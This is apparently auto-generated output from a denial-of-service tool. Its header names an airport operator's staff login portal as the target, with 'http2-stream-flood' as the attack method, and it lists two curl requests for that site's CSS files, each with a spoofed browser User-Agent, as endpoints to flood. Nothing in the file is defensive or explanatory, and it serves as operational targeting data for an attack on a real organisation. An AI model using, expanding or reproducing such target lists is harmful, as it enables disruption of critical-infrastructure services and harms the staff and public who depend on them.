# DDoS Target cURL Commands
# Target: https://staffportal.airportthai.co.th/fo/account/login
# Hostname: staffportal.airportthai.co.th
# Attack Method: http2-stream-flood
# Generated: 2025-12-13T13:46:34+07:00
# Total valid endpoints: 2

curl \
  -X \
  HEAD \
  'https://staffportal.airportthai.co.th/fo/fonts/NotoSans/noto_sans_thai.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://staffportal.airportthai.co.th/fo/css/theme-custom.css?v=wk2y8E8K4xzmH0ZgcFI9p-2ZR5FSnfZpY50QZ6KPjog' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

